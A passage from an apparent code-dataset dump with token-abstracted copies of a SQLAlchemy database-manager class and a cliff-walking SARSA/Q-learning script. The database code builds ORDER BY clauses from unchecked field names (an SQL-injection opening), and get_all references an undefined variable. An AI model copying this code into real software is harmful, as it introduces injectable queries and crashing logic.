'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n\n def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(\n ), field: tuple=()) ->dict:\n \"\"\"获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n \"\"\"\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n <function token>\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n\n def count(self, cls_: BaseMixin, filters: set, field=None) ->int:\n \"\"\"获取满足条件的总行数\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @param string|None field 统计的字段\n @return int\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n if field is None:\n return query.count()\n else:\n return query.count(field)\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n\n def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(\n ), field: tuple=()) ->dict:\n \"\"\"获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n \"\"\"\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n <function token>\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n <function token>\n <function token>\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n <function token>\n <function token>\n <function token>\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n <function token>\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n <function token>\n <function token>\n <function token>\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<assignment token>\n<class token>\n" ]
false
40
cb2e800cc2802031847b170a462778e5c0b3c6f9
from math import * from numpy import * from random import * import numpy as np import matplotlib.pyplot as plt from colorama import Fore, Back, Style from gridworld import q_to_arrow N_ROWS = 6 N_COLUMNS = 10 class State(object): def __init__(self, i, j, is_cliff=False, is_goal=False): self.i = i self.j = j self.is_cliff = is_cliff self.is_goal = is_goal # north, east, south, west self.q_values = np.array([0.0, 0.0, 0.0, 0.0]) def __str__(self): return '({}, {})'.format(self.i, self.j) def is_terminal(self): return self.is_goal or self.is_cliff def get_max_q_index(self): best_q_values = np.argwhere(self.q_values == np.max(self.q_values)) if len(best_q_values) > 1: return best_q_values[randint(0, len(best_q_values) - 1)][0] else: _max_q = np.argmax(self.q_values) return _max_q def get_max_q_value(self): return np.max(self.q_values) def initialize_states(): # This is the set of states, all initialised with default values states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)] # make the cliff for j in range(1, N_COLUMNS - 1): states[-1][j].is_cliff = True states[-1][-1].is_goal = True return states # The reward function defines what reward I get for transitioning between the first and second state def reward(s_1, s_2): if (s_1.is_goal or s_1.is_cliff): return 0 elif (s_2.is_goal): return 10 elif (s_2.is_cliff): return -100 else: return -1 """ the transition function takes state and action and results in a new state, depending on their attributes. The method takes the whole state-space as an argument (since the transition depends on the attributes of the states in the state-space), which could for example be the "states" matrix from above, the current state s from the state-space (with its attributes), and the current action, which takes the form of a "difference vector. For example, dx = 0, dy = 1 means: Move to the south. dx = -1, dy = 0 means: Move to the left""" def transition(stsp, s, di, dj): if (s.is_cliff or s.is_goal): return s elif (s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS)): return s else: return stsp[s.i + di][s.j + dj] gamma = 1 learning_rate = 0.01 def action_to_diff_vector(action): if action == 0: # NORTH return -1, 0 elif action == 1: # EAST return 0, 1 elif action == 2: # SOUTH return 1, 0 elif action == 3: # WEST return 0, -1 def action_to_verbose(action): if action == 0: return 'NORTH' elif action == 1: return 'EAST' elif action == 2: return 'SOUTH' elif action == 3: return 'WEST' def sarsa(state, next_state, action, next_state_action): return reward(state, next_state), state.q_values[action] +\ learning_rate * (reward(state, next_state) + gamma * next_state.q_values[next_state_action] - state.q_values[action]) def q_learning(state, next_state, action, next_state_action): next_state_q_value = next_state.get_max_q_value() return reward(state, next_state), state.q_values[action] +\ learning_rate * (reward(state, next_state) + gamma * next_state_q_value - state.q_values[action]) N_STEPS = 10000 METHOD = 'BOTH' EPSILONS = [0.05, 0.1, 0.25] def run_code(use_q_learning=False, _epsilon=0.01): states = initialize_states() decay = 1 min_epsilon = 0.00001 epsilon = _epsilon episode_rewards = [] mistakes_array = [] # array which tracks error from convergence on each step for i in range(N_STEPS): # select a random starting state current_state = states[N_ROWS-1][0] # iterate until reaching a terminal state epsilon = max(min_epsilon, epsilon * decay) episode_reward = 0 while not current_state.is_terminal(): if random() < epsilon: next_action = randint(0, 3) else: next_action = current_state.get_max_q_index() di, dj = action_to_diff_vector(next_action) next_state = transition(states, current_state, di, dj) if random() < epsilon: next_state_action = randint(0, 3) else: next_state_action = next_state.get_max_q_index() if use_q_learning: reward, current_state.q_values[next_action] = q_learning(current_state, next_state, next_action, next_state_action) else: reward, current_state.q_values[next_action] = sarsa(current_state, next_state, next_action, next_state_action) # print(current_state, next_state, action_to_verbose(next_action), di, dj) episode_reward += reward current_state = next_state if len(episode_rewards): episode_rewards.append(episode_rewards[-1] + episode_reward) else: episode_rewards.append(episode_reward) ''' if (i % 100 == 0): print(i) ''' mistakes_array.append(check_accuracy(states)) return np.array(mistakes_array), states, episode_rewards def check_accuracy(states): correct_result = np.array([ [-3, -2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 ], [-2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 ], [-1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ], [0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ], [1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ], [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ], ]) mistakes_delta = 0 for i in range(N_ROWS): for j in range(N_COLUMNS): mistakes_delta += abs(correct_result[i][j] - max(states[i][j].q_values)) return mistakes_delta def plot_errors(mistakes_sarsa, mistakes_q_learning): plt.gca().invert_yaxis() legend = [] for mistake_sarsa in mistakes_sarsa: plt.plot(mistake_sarsa[1]) legend.append(r'SARSA $\epsilon={}$'.format(mistake_sarsa[0])) for mistake_q_learning in mistakes_q_learning: plt.plot(mistake_q_learning[1]) legend.append(r'Q-learning $\epsilon={}$'.format(mistake_q_learning[0])) plt.grid(which='y') plt.legend(legend) plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS)) # plt.show() def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax): final_grid = np.array([[max(states[i][j].q_values) for j in range(N_COLUMNS)] for i in range(N_ROWS)]) if PLOTS > 2: ax = ax[PLOTS % 3, 1] else: ax = ax[PLOTS, 0] ax.imshow(final_grid, aspect='auto', cmap='coolwarm') # fig, ax = plt.subplots() ax.set_xticks(np.arange(N_COLUMNS)) ax.set_yticks(np.arange(N_ROWS)) ax.set_xticklabels([i for i in range(N_COLUMNS)]) ax.set_yticklabels([i for i in range(N_ROWS)]) plt.setp(ax.get_xticklabels(), rotation=45, ha="right", rotation_mode="anchor") # Loop over data dimensions and create text annotations. for i in range(N_ROWS): for j in range(N_COLUMNS): text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)), ha="center", va="center", color="w") fig.tight_layout() ax.set_title("{}; $\epsilon={}$".format(method, epsilon)) for i in range(N_ROWS): str_ = "" for j in range(N_COLUMNS): str_ += str(int(final_grid[i][j])) + ", " PLOTS += 1 # plt.savefig('CLIFF_WALKING: {}-{}-{}.png'.format(N_STEPS, epsilon, method)) # plt.show() def display_optimal_policy(states, method, epsilon): print("{}; ε = {}".format(method, epsilon)) print('-' * 60) for i in range(len(states)): line_str = '' for j in range(len(states[0])): if j == 0: print('|', end='') if states[i][j].is_goal: print(Back.GREEN + ' ', end='') print(Style.RESET_ALL + ' | ', end='') elif states[i][j].is_cliff: print(Back.RED + ' ', end='') print(Style.RESET_ALL + ' | ', end='') else: print(' {} | '.format(q_to_arrow(states[i][j].get_max_q_index())), end='') print(line_str) print('-' * 60) if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']: print('invalidt method. must be Q_LEARNING or SARSA or both') import sys; sys.exit() mistakes_q_learning = [] mistakes_sarsa = [] PLOTS = 0 fig, axes = plt.subplots(3, 2) rewards = [] for epsilon in EPSILONS: if METHOD == 'Q_LEARNING' or METHOD == 'BOTH': _mistakes_q_learning, end_states_q_learning, episode_rewards = run_code(use_q_learning=True, _epsilon=epsilon) plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING', epsilon, PLOTS, fig, axes) display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon) mistakes_q_learning.append((epsilon, _mistakes_q_learning)) rewards.append(('Q_LEARNING', epsilon, episode_rewards)) PLOTS += 1 for epsilon in EPSILONS: if METHOD == 'SARSA' or METHOD == 'BOTH': _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(use_q_learning=False, _epsilon=epsilon) plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS, fig, axes) display_optimal_policy(end_states_sarsa, 'SARSA', epsilon) mistakes_sarsa.append((epsilon, _mistakes_sarsa)) rewards.append(('SARSA', epsilon, episode_rewards)) PLOTS += 1 plt.savefig('all_runs.png') plt.show() # for i, j in [(0, 3), (1, 4), (2, 5)]: for reward in rewards: # plt.plot(rewards[i][2], 'o', label='{} ε = {} '.format(rewards[i][0], rewards[i][1])) # plt.plot(rewards[j][2], 'o', label='{} ε = {} '.format(rewards[j][0], rewards[j][1])) plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1])) plt.xlabel('Episodes') plt.ylabel('Sum of rewards during episode') plt.legend() plt.show() plt.savefig('episode_rewards.png') plot_errors(mistakes_sarsa, mistakes_q_learning)
[ "from math import *\nfrom numpy import *\nfrom random import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom colorama import Fore, Back, Style\nfrom gridworld import q_to_arrow\n\n\nN_ROWS = 6\nN_COLUMNS = 10\n\nclass State(object):\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n # north, east, south, west\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n # This is the set of states, all initialised with default values\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n\n # make the cliff\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n\n states[-1][-1].is_goal = True\n return states\n\n\n# The reward function defines what reward I get for transitioning between the first and second state\ndef reward(s_1, s_2):\n if (s_1.is_goal or s_1.is_cliff):\n return 0\n elif (s_2.is_goal):\n return 10\n elif (s_2.is_cliff):\n return -100\n else:\n return -1\n\n\"\"\" the transition function takes state and action and results in a new state, depending on their attributes. The method takes the whole state-space as an argument (since the transition depends on the attributes of the states in the state-space), which could for example be the \"states\" matrix from above, the current state s from the state-space (with its attributes), and the current action, which takes the form of a \"difference vector. For example, dx = 0, dy = 1 means: Move to the south. dx = -1, dy = 0 means: Move to the left\"\"\"\ndef transition(stsp, s, di, dj):\n if (s.is_cliff or s.is_goal):\n return s\n elif (s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS)):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\ngamma = 1\nlearning_rate = 0.01\n\ndef action_to_diff_vector(action):\n if action == 0: # NORTH\n return -1, 0\n elif action == 1: # EAST\n return 0, 1\n elif action == 2: # SOUTH\n return 1, 0\n elif action == 3: # WEST\n return 0, -1\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action] +\\\n learning_rate * (reward(state, next_state) + gamma * next_state.q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action] +\\\n learning_rate * (reward(state, next_state) + gamma * next_state_q_value - state.q_values[action])\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 0.00001\n epsilon = _epsilon\n\n episode_rewards = []\n mistakes_array = [] # array which tracks error from convergence on each step\n for i in range(N_STEPS):\n # select a random starting state\n current_state = states[N_ROWS-1][0]\n\n # iterate until reaching a terminal state\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(current_state, next_state, next_action, next_state_action)\n\n # print(current_state, next_state, action_to_verbose(next_action), di, dj)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n\n '''\n if (i % 100 == 0):\n print(i)\n '''\n mistakes_array.append(check_accuracy(states))\n\n return np.array(mistakes_array), states, episode_rewards\n\ndef check_accuracy(states):\n correct_result = np.array([\n [-3, -2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 ],\n [-2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 ],\n [-1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ],\n [0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ],\n [1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ],\n ])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].q_values))\n\n return mistakes_delta\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append(r'SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append(r'Q-learning $\\epsilon={}$'.format(mistake_q_learning[0]))\n\n plt.grid(which='y')\n plt.legend(legend)\n\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n # plt.show()\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n # fig, ax = plt.subplots()\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)),\n ha=\"center\", va=\"center\", color=\"w\")\n\n fig.tight_layout()\n ax.set_title(\"{}; $\\epsilon={}$\".format(method, epsilon))\n for i in range(N_ROWS):\n str_ = \"\"\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + \", \"\n PLOTS += 1\n # plt.savefig('CLIFF_WALKING: {}-{}-{}.png'.format(N_STEPS, epsilon, method))\n # plt.show()\n\ndef display_optimal_policy(states, method, epsilon):\n\n print(\"{}; ε = {}\".format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. must be Q_LEARNING or SARSA or both')\n import sys; sys.exit()\n\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = run_code(use_q_learning=True, _epsilon=epsilon)\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING', epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\n\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\n\n\nplt.savefig('all_runs.png')\nplt.show()\n# for i, j in [(0, 3), (1, 4), (2, 5)]:\nfor reward in rewards:\n # plt.plot(rewards[i][2], 'o', label='{} ε = {} '.format(rewards[i][0], rewards[i][1]))\n # plt.plot(rewards[j][2], 'o', label='{} ε = {} '.format(rewards[j][0], rewards[j][1]))\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\n\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n", "from math import *\nfrom numpy import *\nfrom random import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom colorama import Fore, Back, Style\nfrom gridworld import q_to_arrow\nN_ROWS = 6\nN_COLUMNS = 10\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n 